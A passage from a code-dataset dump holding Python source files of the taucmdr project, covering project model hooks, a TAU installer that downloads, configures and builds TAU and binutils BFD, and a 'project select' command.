self['name'])\n \n def onCreate(self):\n if set(self['name']) > Project._valid_name:\n raise ctl.ModelError('%r is not a valid project name.' % self['name'],\n 'Use only letters, numbers, dot (.), dash (-), and underscore (_).')\n prefix = self.prefix()\n try:\n util.mkdirp(prefix)\n except Exception as err:\n raise error.ConfigurationError('Cannot create directory %r: %s' % (prefix, err), \n 'Check that you have `write` access')\n\n def onDelete(self):\n prefix = self.prefix()\n try:\n shutil.rmtree(prefix)\n except Exception as err:\n if os.path.exists(prefix):\n LOGGER.error(\"Could not remove project data at '%s': %s\" % (prefix, err))" }, { "alpha_fraction": 0.6033194661140442, "alphanum_fraction": 0.6058917045593262, "avg_line_length": 33.96359634399414, "blob_id": "a6d4ebd2da5e1f1e7adcb444b191b5f323cffc56", "content_id": "bbfc292ad703a9fac103bfdd0b454a1923e08041", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16328, "license_type": "permissive", "max_line_length": 174, "num_lines": 467, "path": "/packages/tau/cf/tau.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. 
Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport sys\nimport glob\nimport errno\n\n# TAU modules\nimport logger\nimport util\nimport error\nimport environment\n\n\nLOGGER = logger.getLogger(__name__)\n\nDEFAULT_SOURCE = {None: 'http://tau.uoregon.edu/tau.tgz'}\n\nCOMPILER_WRAPPERS = {'CC': 'tau_cc.sh',\n 'CXX': 'tau_cxx.sh',\n 'FC': 'tau_f90.sh',\n 'UPC': 'tau_upc.sh'}\n\nCOMMANDS = [\n 'jumpshot',\n 'paraprof',\n 'perfdmf_configure',\n 'perfdmf_createapp',\n 'perfdmf_createexp',\n 'perfdmfdb.py',\n 'perfdmf_loadtrial',\n 'perfexplorer',\n 'perfexplorer_configure',\n 'phaseconvert',\n 'pprof',\n 'ppscript',\n 'slog2print',\n 'tau2slog2',\n 'tau_analyze',\n 'taucc',\n 'tau_cc.sh',\n 'tau_compiler.sh',\n 'tau-config',\n 'tau_convert',\n 'taucxx',\n 'tau_cxx.sh',\n 'taudb_configure',\n 'taudb_install_cert',\n 'taudb_keygen',\n 'taudb_loadtrial',\n 'tau_ebs2otf.pl',\n 'tau_ebs_process.pl',\n 'tauex',\n 'tau_exec',\n 'tau_f77.sh',\n 'tauf90',\n 'tau_f90.sh',\n 'tau_gen_wrapper',\n 'tau_header_replace.pl',\n 'tauinc.pl',\n 'tau_java',\n 'tau_javamax.sh',\n 'tau_macro.sh',\n 'tau_merge',\n 'tau_multimerge',\n 'tau_pebil_rewrite',\n 'tau_reduce',\n 'tau_resolve_addresses.py',\n 'tau_rewrite',\n 'tau_selectfile',\n 'tau_show_libs',\n 'tau_throttle.sh',\n 'tau_treemerge.pl',\n 'tauupc',\n 'tau_upc.sh',\n 'tau_user_setup.sh',\n 'trace2profile'\n]\n\n\ndef _parseConfig(config, commandline_opts, environment_vars):\n \"\"\"\n TODO: Docs\n \"\"\"\n opts = set()\n envs = dict()\n for key, val in config.iteritems():\n try:\n option = commandline_opts[key]\n except KeyError:\n pass\n else:\n try:\n opts |= set(option(val))\n except TypeError:\n try:\n opts |= set(option[val])\n except KeyError:\n raise error.InternalError('Invalid TAU configuration parameter: %s=%s' % (key, val))\n try:\n option = environment_vars[key]\n except KeyError:\n pass\n else:\n try:\n 
envs.update(option(val))\n except TypeError:\n try:\n envs.update(option[val])\n except KeyError:\n raise error.InternalError('Invalid TAU configuration parameter: %s=%s' % (key, val))\n return list(opts), envs\n\nclass Tau(object):\n \"\"\"\n Encapsulates a TAU installation\n \"\"\"\n def __init__(self, prefix, cc, cxx, fc, src, arch, \n pdt, bfd, libunwind, **config):\n if not arch:\n arch = _detectDefaultHostArch()\n if src.lower() == 'download':\n try:\n src = DEFAULT_SOURCE[arch]\n except KeyError:\n src = DEFAULT_SOURCE[None]\n self.prefix = prefix\n self.cc = cc\n self.cxx = cxx\n self.fc = fc\n self.src = src\n self.arch = arch\n self.pdt = pdt\n self.bfd = bfd\n self.libunwind = libunwind\n if os.path.isdir(src):\n self.tau_prefix = src\n else:\n compiler_prefix = '.'.join([str(c.eid) for c in cc, cxx, fc if c])\n self.tau_prefix = os.path.join(prefix, 'tau', compiler_prefix)\n self.src_prefix = os.path.join(prefix, 'src')\n self.include_path = os.path.join(self.tau_prefix, 'include')\n self.arch_path = os.path.join(self.tau_prefix, arch)\n self.bin_path = os.path.join(self.arch_path, 'bin')\n self.lib_path = os.path.join(self.arch_path, 'lib')\n self.config = config\n self.config['halt_build_on_error'] = False # This feels hacky\n\n def getTags(self):\n \"\"\"\n TODO: Docs\n \"\"\"\n tags = []\n config = self.config\n \n family = self.cc['family']\n if family != 'GNU':\n compiler_tags = {'Intel': 'icpc', 'PGI': 'pgi'}\n try:\n tags.append(compiler_tags[family])\n except KeyError:\n raise error.InternalError(\"No makefile tag specified to compiler family '%s'\" % family)\n \n if config['source_inst']:\n tags.append('pdt')\n if config['openmp_support']:\n openmp_tags = {'ignore': 'openmp',\n 'ompt': 'ompt',\n 'opari': 'opari'}\n tags.append(openmp_tags[config['openmp_measurements']])\n if config['pthreads_support']:\n tags.append('pthread')\n if config['mpi_support']:\n tags.append('mpi')\n if config['cuda_support']:\n tags.append('cuda') \n if config['shmem_support']:\n tags.append('shmem')\n if config['mpc_support']:\n tags.append('mpc')\n \n LOGGER.debug(\"TAU tags: %s\" % tags)\n return tags\n\n def verify(self):\n \"\"\"\n Returns true if if there is a working TAU installation at `prefix` with a\n directory named `arch` containing `bin` and `lib` directories or \n raises a ConfigurationError describing why that installation is broken.\n \"\"\"\n LOGGER.debug(\"Checking TAU installation at '%s' targeting arch '%s'\" % (self.tau_prefix, self.arch)) \n if not os.path.exists(self.tau_prefix):\n raise error.ConfigurationError(\"'%s' does not exist\" % self.tau_prefix)\n \n # Check for all commands\n for cmd in COMMANDS:\n path = os.path.join(self.bin_path, cmd)\n if not os.path.exists(path):\n raise error.ConfigurationError(\"'%s' is missing\" % path)\n if not os.access(path, os.X_OK):\n raise error.ConfigurationError(\"'%s' exists but is not executable\" % path)\n \n # Check that there is at least one makefile\n makefile = os.path.join(self.include_path, 'Makefile')\n if not os.path.exists(makefile):\n raise error.ConfigurationError(\"'%s' does not exist\" % makefile)\n \n # Check for Makefile.tau matching this configuration\n makefile = self.getMakefile()\n if not makefile:\n raise error.ConfigurationError(\"TAU Makefile not found: %s\" % makefile)\n \n # Open makefile, check BFDINCLUDE, UNWIND_INC\n LOGGER.debug(\"Tau Makefile %s :\" %makefile)\n with open(makefile, 'r') as myMakeFile:\n data = myMakeFile.readlines()\n for line in data:\n if ('BFDINCLUDE=' in line):\n 
mfBfdInc=line.split('=')[1].strip().strip(\"-I\")\n if (self.bfd.include_path != mfBfdInc):\n raise error.ConfigurationError(\"TAU Makefile does not have BFDINCLUDE = %s set to the BFD_INCLUDE_PATH = %s \" % (mfBfdInc,self.bfd.include_path)) \n if ('UNWIND_INC=' in line):\n mfUwInc=line.split('=')[1].strip().strip(\"-I\")\n if (self.libunwind.include_path != mfUwInc):\n raise error.ConfigurationError(\"TAU Makefile does not have UNWIND_INC= {} set to the LIBUNWIND_INCLUDE_PATH = {}\".format(mfUwInc,self.libunwind.include_path)) \n \n #matching bfd.include_path\n # grep for BFDINCLUDE\n # !! not found, raise error.ConfigurationError(\"BFD not configured in %s\" % makefile)\n # .... similar for libunwind\n \n LOGGER.debug(\"TAU installation at '%s' is valid\" % self.tau_prefix)\n return True\n\n def install(self, force_reinstall=False):\n \"\"\"\n TODO: Docs\n \"\"\"\n LOGGER.debug(\"Initializing TAU at '%s' from '%s' with arch=%s\" % \n (self.tau_prefix, self.src, self.arch))\n \n # Check if the installation is already initialized\n if not force_reinstall:\n try:\n return self.verify()\n except error.ConfigurationError, err:\n LOGGER.debug(err)\n LOGGER.info('Starting TAU installation')\n \n # Download, unpack, or copy TAU source code\n dst = os.path.join(self.src_prefix, os.path.basename(self.src))\n src = os.path.join(self.tau_prefix, 'src')\n LOGGER.debug(\"Checking for TAU source at '%s'\" % src)\n if os.path.exists(src):\n LOGGER.debug(\"Found source at '%s'\" % src)\n srcdir = src\n else:\n LOGGER.debug(\"Source not found, aquiring from '%s'\" % self.src)\n try:\n util.download(self.src, dst)\n srcdir = util.extract(dst, self.src_prefix)\n except IOError:\n raise error.ConfigurationError(\"Cannot acquire source file '%s'\" % self.src,\n \"Check that the file or directory is accessable\")\n finally:\n try: os.remove(dst)\n except: pass\n\n # TAU's configure script has a goofy way of specifying the fortran compiler\n if self.fc:\n if self.fc['family'] != 'MPI':\n family_map = {'GNU': 'gfortran', \n 'Intel': 'intel'}\n fc_family = self.fc['family']\n try:\n fortran_flag = '-fortran=%s' % family_map[fc_family]\n except KeyError:\n raise InternalError(\"Unknown compiler family for Fortran: '%s'\" % fc_family)\n else:\n # TODO: Recognize family from MPI compiler\n raise InternalError(\"Unknown compiler family for Fortran: '%s'\" % fc_family)\n else:\n fortran_flag = ''\n \n # Check PDT\n if bool(self.config['source_inst']) != bool(self.pdt):\n raise error.InternalError(\"pdt=%s but config['source_inst']=%s\" % (self.pdt, self.config['source_inst']))\n\n # Check BFD\n if (self.config['sample'] or self.config['compiler_inst'] != 'never') and (not self.bfd):\n LOGGER.warning(\"BFD is recommended when using sampling or compiler-based instrumentation\")\n\n # Check libunwind\n if (bool(self.config['sample']) or bool(self.config['openmp_support'])) != bool(self.libunwind):\n LOGGER.warning(\"libunwind is recommended when using sampling or OpenMP\")\n\n # Gather TAU configuration flags\n base_flags = ['-prefix=%s' % self.tau_prefix, \n '-arch=%s' % self.arch, \n '-cc=%s' % self.cc['command'] if self.cc else '', \n '-c++=%s' % self.cxx['command'] if self.cxx else '', \n fortran_flag,\n '-pdt=%s' % self.pdt.pdt_prefix if self.pdt else '',\n '-bfd=%s' % self.bfd.bfd_prefix if self.bfd else '',\n '-unwind=%s' % self.libunwind.libunwind_prefix if self.libunwind else '']\n if self.config['mpi_support']:\n mpi_flags = ['-mpi'\n # TODO: -mpiinc, -mpilib, -mpilibrary\n ]\n else:\n mpi_flags = []\n if 
self.config['openmp_support']:\n openmp_flags = ['-openmp']\n measurements = self.config['openmp_measurements'] \n if measurements == 'ompt':\n if self.cc['family'] == 'Intel':\n openmp_flags.append('-ompt')\n else:\n raise error.ConfigurationError('OMPT for OpenMP measurement only works with Intel compilers')\n elif measurements == 'opari':\n openmp_flags.append('-opari')\n else:\n openmp_flags = []\n if self.config['pthreads_support']:\n pthreads_flags = ['-pthread']\n else:\n pthreads_flags = []\n\n # Execute configure\n cmd = ['./configure'] + base_flags + mpi_flags + openmp_flags + pthreads_flags\n LOGGER.info(\"Configuring TAU...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.ConfigurationError('TAU configure failed')\n \n # Execute make\n cmd = ['make', '-j4', 'install']\n LOGGER.info('Compiling TAU...')\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.ConfigurationError('TAU compilation failed.')\n\n # Leave source, we'll probably need it again soon\n # Create a link to the source for reuse\n LOGGER.debug('Preserving %r for future use' % srcdir)\n try:\n os.symlink(srcdir, src)\n except OSError as err:\n if not (err.errno == errno.EEXIST and os.path.islink(src)):\n LOGGER.warning(\"Can't create symlink '%s'. TAU source code won't be reused across configurations.\" % src)\n \n # Verify the new installation and return\n LOGGER.info('TAU installation complete')\n return self.verify()\n\n def getMakefile(self):\n \"\"\"\n Returns an absolute path to a TAU_MAKEFILE\n \"\"\"\n config_tags = set(self.getTags())\n if not len(config_tags):\n return 'Makefile.tau'\n tau_makefiles = glob.glob(os.path.join(self.lib_path, 'Makefile.tau*'))\n for makefile in tau_makefiles:\n tags = set(os.path.basename(makefile).split('.')[1].split('-')[1:])\n if tags <= config_tags and config_tags <= tags:\n return os.path.join(self.lib_path, makefile)\n LOGGER.debug(\"No TAU makefile matches tags '%s'. 
Available: %s\" % (config_tags, tau_makefiles))\n return None\n\n def applyCompiletimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n commandline_options = {\n 'halt_build_on_error': {True: [], False: ['-optRevert']},\n 'verbose': {True: ['-optVerbose'], False: ['-optQuiet']},\n 'compiler_inst': {'always': ['-optCompInst'], \n 'never': ['-optNoCompInst'],\n 'fallback': ['-optRevert', '-optNoCompInst']}\n }\n environment_variables = {} \n tauOpts, tauEnv = _parseConfig(self.config, commandline_options, environment_variables)\n opts.extend(tauOpts)\n env.update(tauEnv)\n env['PATH'] = os.pathsep.join([self.bin_path, env.get('PATH')])\n env['TAU_MAKEFILE'] = self.getMakefile()\n\n def applyRuntimeConfig(self, opts, env):\n \"\"\"\n TODO: Docs\n \"\"\"\n commandline_options = {\n 'verbose': {True: ['-v'], False: []},\n 'sample': {True: ['-ebs'], False: []}\n }\n environment_variables = {\n 'verbose': {True: {'TAU_VERBOSE': '1'}, \n False: {'TAU_VERBOSE': '0'}},\n 'profile': {True: {'TAU_PROFILE': '1'}, \n False: {'TAU_PROFILE': '0'}},\n 'trace': {True: {'TAU_TRACE': '1'}, \n False: {'TAU_TRACE': '0'}},\n 'sample': {True: {'TAU_SAMPLING': '1'}, \n False: {'TAU_SAMPLING': '0'}},\n 'callpath': lambda depth: ({'TAU_CALLPATH': '1', 'TAU_CALLPATH_DEPTH': str(depth)} \n if depth > 0 else {'TAU_CALLPATH': '0'})\n }\n tauOpts, tauEnv = _parseConfig(self.config, commandline_options, environment_variables)\n opts.extend(tauOpts)\n env.update(tauEnv)\n\n env['PATH'] = os.pathsep.join([self.bin_path, env.get('PATH')])\n \n def showProfile(self, path):\n \"\"\"\n Shows profile data in the specified file or folder\n \"\"\"\n _, env = environment.base()\n env['PATH'] = os.pathsep.join([self.bin_path, env.get('PATH')])\n for viewer in 'paraprof', 'pprof':\n if os.path.isfile(path):\n cmd = [viewer, path]\n else:\n cmd = [viewer]\n LOGGER.info(\"Opening %s in %s\" % (path, viewer))\n retval = util.createSubprocess(cmd, cwd=path, env=env, log=False)\n if retval != 0:\n LOGGER.warning(\"%s failed\")\n if retval != 0:\n raise error.ConfigurationError(\"All viewers failed to open '%s'\" % path,\n \"Check that `java` is working, X11 is working,\"\n \" network connectivity, and file permissions\")\n" }, { "alpha_fraction": 0.6281304359436035, "alphanum_fraction": 0.6310425400733948, "avg_line_length": 34.402061462402344, "blob_id": "774d53e63f6fd08764b6afd6c9fb4ad3f9d3a5f4", "content_id": "5b82e9c10fef52c7d76074b912bdf040724d7454", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6868, "license_type": "permissive", "max_line_length": 106, "num_lines": 194, "path": "/packages/tau/commands/project/select.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. 
nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# TAU modules\nimport tau\nimport logger\nimport error\nimport arguments as args\nfrom model.project import Project\nfrom model.target import Target\nfrom model.application import Application\nfrom model.measurement import Measurement\nfrom model.experiment import Experiment\n\n\nLOGGER = logger.getLogger(__name__)\n\nSHORT_DESCRIPTION = \"Select project components for the next experiment.\"\n\nCOMMAND = ' '.join(['tau'] + (__name__.split('.')[1:]))\n\nUSAGE = \"\"\"\n %(command)s project_name [target] [application] [measurement] [arguments]\n\"\"\" % {'command': COMMAND}\n\nHELP = \"\"\"\n'%(command)s' page to be written.\n\"\"\" % {'command': COMMAND}\n\nPARSER = args.getParserFromModel(Project,\n prog=COMMAND, \n usage=USAGE, \n description=SHORT_DESCRIPTION)\nPARSER.add_argument('impl_target', \n help=\"Target configuration to select\",\n metavar='[target]',\n nargs='*',\n default=args.SUPPRESS)\nPARSER.add_argument('impl_application', \n help=\"Application configuration to select\",\n metavar='[application]',\n nargs='*',\n default=args.SUPPRESS)\nPARSER.add_argument('impl_measurement', \n help=\"Measurement configuration to select\",\n metavar='[measurements]',\n nargs='*',\n default=args.SUPPRESS) \nPARSER.add_argument('--target',\n help=\"Target configuration to select\",\n metavar='<name>',\n default=args.SUPPRESS)\nPARSER.add_argument('--application', \n help=\"Application configuration to select\",\n metavar='<name>',\n default=args.SUPPRESS)\nPARSER.add_argument('--measurement', \n help=\"Measurement configuration to select\",\n metavar='<name>',\n default=args.SUPPRESS)\n\n\ndef getUsage():\n return PARSER.format_help() \n\n\ndef getHelp():\n return HELP\n\n\ndef _select(project, attr, given):\n in_project = project[attr]\n if len(given) > 1:\n names = ', '.join([m['name'] for m in list(given)])\n PARSER.error('Multiple %s given (%s). Please specify only one.' % (attr, names))\n elif len(given) == 1:\n selected = list(given)[0]\n if selected.eid not in in_project:\n PARSER.error(\"'%s' is not a member of project '%s'\" % (selected['name'], project['name']))\n return selected.eid\n else:\n if len(in_project) > 1:\n PARSER.error(\"Project '%s' has multiple %s. Please specify which to use.\" % (project['name'], attr))\n elif len(in_project) == 1:\n return in_project[0]\n else:\n PARSER.error(\"Project '%s' has no %s. 
See `tau project edit --help`.\" % (project['name'], attr))\n\n\ndef main(argv):\n \"\"\"\n Program entry point\n \"\"\" \n args = PARSER.parse_args(args=argv)\n LOGGER.debug('Arguments: %s' % args)\n \n project = Project.withName(args.name)\n if not project:\n PARSER.error(\"There is no project named %r\" % args.name)\n \n given_targets = set()\n given_applications = set()\n given_measurements = set()\n \n for attr, model, dest in [('target', Target, given_targets), \n ('application', Application, given_applications), \n ('measurement', Measurement, given_measurements)]:\n try:\n name = getattr(args, attr)\n except AttributeError:\n pass\n else:\n m = model.withName(name)\n if m:\n dest.add(m)\n else:\n PARSER.error('There is no %s named %s' % (attr, name))\n \n for name in getattr(args, 'impl_'+attr, []):\n t = Target.withName(name)\n a = Application.withName(name)\n m = Measurement.withName(name)\n tam = set([t,a,m]) - set([None])\n if len(tam) > 1:\n PARSER.error(\"'%s' is ambiguous, please use --target, --application,\"\n \" or --measurement to specify configuration type\" % name)\n elif len(tam) == 0:\n PARSER.error(\"'%s' is not a target, application, or measurement\" % name)\n elif t:\n given_targets.add(t)\n elif a:\n given_applications.add(a)\n elif m:\n given_measurements.add(m)\n \n target_eid = _select(project, 'targets', given_targets)\n application_eid = _select(project, 'applications', given_applications)\n measurement_eid = _select(project, 'measurements', given_measurements)\n data = {'project': project.eid,\n 'target': target_eid,\n 'application': application_eid,\n 'measurement': measurement_eid}\n found = Experiment.search(data)\n if not found:\n LOGGER.debug('Creating new experiment')\n found = Experiment.create(data)\n elif len(found) > 1:\n raise error.InternalError('More than one experiment with data %r exists!' % data)\n else:\n LOGGER.debug('Using existing experiment')\n found = found[0]\n\n populated = found.populate()\n LOGGER.info(\"'%s' on '%s' measured by '%s'\" % \n (populated['application']['name'],\n populated['target']['name'],\n populated['measurement']['name']))\n found.select()\n \n return tau.EXIT_SUCCESS\n" }, { "alpha_fraction": 0.6550087332725525, "alphanum_fraction": 0.6571321487426758, "avg_line_length": 34.55555725097656, "blob_id": "7dc40bb0bc3733077ad2f776852ea6ea267a06e8", "content_id": "d60b75b6ba124597ae6a1486a1e1e1bab94431a1", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8006, "license_type": "permissive", "max_line_length": 113, "num_lines": 225, "path": "/packages/tau/cf/bfd.py", "repo_name": "gitter-badger/taucmdr", "src_encoding": "UTF-8", "text": "\"\"\"\n@file\n@author John C. Linford ([email protected])\n@version 1.0\n\n@brief\n\nThis file is part of the TAU Performance System\n\n@section COPYRIGHT\n\nCopyright (c) 2013, ParaTools, Inc.\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without \nmodification, are permitted provided that the following conditions are met:\n (1) Redistributions of source code must retain the above copyright notice, \n this list of conditions and the following disclaimer.\n (2) Redistributions in binary form must reproduce the above copyright notice, \n this list of conditions and the following disclaimer in the documentation \n and/or other materials provided with the distribution.\n (3) Neither the name of ParaTools, Inc. 
nor the names of its contributors may \n be used to endorse or promote products derived from this software without \n specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" \nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE \nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE \nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE \nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL \nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR \nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER \nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, \nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE \nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\"\"\"\n\n# System modules\nimport os\nimport glob\nimport sys\nimport shutil\nimport platform\n\n# TAU modules\nimport cf\nimport logger\nimport util\nimport error\nimport environment\n\n\nLOGGER = logger.getLogger(__name__)\n\nDEFAULT_SOURCE = {None: 'http://www.cs.uoregon.edu/research/paracomp/tau/tauprofile/dist/binutils-2.23.2.tar.gz'}\n\nLIBS = {None: ['libbfd.a']}\n\n\nclass Bfd(object):\n \"\"\"\n Encapsulates a BFD installation\n \"\"\"\n def __init__(self, prefix, cxx, src, arch):\n self.src = src\n if src.lower() == 'download':\n try:\n self.src = DEFAULT_SOURCE[arch]\n except KeyError:\n self.src = DEFAULT_SOURCE[None]\n self.prefix = prefix\n self.cxx = cxx\n self.arch = arch\n if os.path.isdir(src):\n self.bfd_prefix = src\n else:\n compiler_prefix = str(cxx.eid) if cxx else 'unknown'\n self.bfd_prefix = os.path.join(prefix, 'bfd', compiler_prefix)\n self.src_prefix = os.path.join(prefix, 'src')\n self.include_path = os.path.join(self.bfd_prefix, 'include')\n self.bin_path = os.path.join(self.bfd_prefix, 'bin')\n self.lib_path = os.path.join(self.bfd_prefix, 'lib')\n\n def verify(self):\n \"\"\"\n Returns True if there is a working BFD installation at `prefix` with all\n expected libraries present in the `lib` directory, or \n raises a ConfigurationError describing why that installation is broken.\n \"\"\"\n LOGGER.debug(\"Checking BFD installation at '%s' targeting arch '%s'\" % (self.bfd_prefix, self.arch)) \n if not os.path.exists(self.bfd_prefix):\n raise error.ConfigurationError(\"'%s' does not exist\" % self.bfd_prefix)\n # Check for all libraries\n try:\n libraries = LIBS[self.arch]\n LOGGER.debug(\"Checking %s BFD libraries\" % libraries)\n except KeyError:\n libraries = LIBS[None]\n LOGGER.debug(\"Checking default BFD libraries\")\n for lib in libraries:\n path = os.path.join(self.lib_path, lib)\n if not os.path.exists(path):\n raise error.ConfigurationError(\"'%s' is missing\" % path)\n# if not os.access(path, os.X_OK):\n# raise error.ConfigurationError(\"'%s' exists but is not executable\" % path)\n \n LOGGER.debug(\"BFD installation at '%s' is valid\" % self.bfd_prefix)\n return True\n\n def install(self, force_reinstall=False):\n \"\"\"\n TODO: Docs\n \"\"\"\n LOGGER.debug(\"Initializing BFD at '%s' from '%s' with arch=%s\" % \n (self.bfd_prefix, self.src, self.arch))\n \n # Check if the installation is already initialized\n if not force_reinstall:\n try:\n return self.verify()\n except error.ConfigurationError as err:\n LOGGER.debug(err)\n LOGGER.info('Starting BFD installation')\n\n # Download, unpack, or copy BFD source code\n 
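# util.download copies local files or fetches remote URLs (via curl/wget), and util.extract unpacks the archive and returns the unpacked source directory\n 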
dst = os.path.join(self.src_prefix, os.path.basename(self.src))\n try:\n util.download(self.src, dst)\n srcdir = util.extract(dst, self.src_prefix)\n except IOError as err:\n raise error.ConfigurationError(\"Cannot acquire source file '%s': %s\" % (self.src, err),\n \"Check that the file is accessible\")\n finally:\n try: os.remove(dst)\n except: pass\n\n if not self.cxx:\n compiler_flag = []\n else:\n family_flags = {'system': [],\n 'GNU': ['-GNU'],\n 'Intel': ['CC=icc','CXX=icpc'] \n }\n# 'PGI': '-pgCC'}\n try:\n compiler_flag = family_flags[self.cxx['family']]\n except KeyError:\n compiler_flag = []\n LOGGER.warning(\"BFD has no compiler flag for '%s'. Using defaults.\" % self.cxx['family'])\n\n try:\n # Configure\n prefix_flag = '-prefix=%s' % self.bfd_prefix\n cmd = ['./configure', prefix_flag] + compiler_flag\n LOGGER.info(\"Configuring BFD...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('BFD configure failed')\n\n # Build\n cmd = ['make', '-j4']\n LOGGER.info(\"Compiling BFD...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('BFD compilation failed.')\n\n # Install\n cmd = ['make', 'install']\n LOGGER.info(\"Installing BFD...\")\n if util.createSubprocess(cmd, cwd=srcdir, stdout=False):\n raise error.SoftwarePackageError('BFD installation failed before verification.')\n\n #cp headers from source to install\n\n LOGGER.info(\"Copying headers from BFD source to install 'include'.\")\n for file in glob.glob(os.path.join(srcdir,'bfd','*.h')):\n shutil.copy(file,self.include_path)\n for file in glob.glob(os.path.join(srcdir,'include','*')):\n try: \n shutil.copy(file, self.include_path)\n except: \n dst = os.path.join(self.include_path, os.path.basename(file))\n shutil.copytree(file,dst)\n\n \n #cp additional libraries:\n LOGGER.info(\"Copying missing libraries to install 'lib'.\")\n shutil.copy(os.path.join(srcdir,'libiberty','libiberty.a'),self.lib_path)\n shutil.copy(os.path.join(srcdir,'opcodes','libopcodes.a'),self.lib_path)\n \n\n #fix bfd.h header in the install include location\n LOGGER.info(\"Fixing BFD header in install 'include' location.\")\n with open (os.path.join(self.include_path,'bfd.h'),\"r+\") as myfile:\n data=myfile.read().replace('#if !defined PACKAGE && !defined PACKAGE_VERSION','#if 0') \n myfile.seek(0,0)\n myfile.write(data)\n \n except Exception as err:\n LOGGER.info(\"BFD installation failed, cleaning up %s \" % err)\n shutil.rmtree(self.bfd_prefix, ignore_errors=True)\n finally:\n # Always clean up BFD source\n LOGGER.debug('Deleting %r' % srcdir)\n shutil.rmtree(srcdir, ignore_errors=True)\n \n # Verify the new installation\n try:\n retval = self.verify()\n LOGGER.info('BFD installation complete')\n 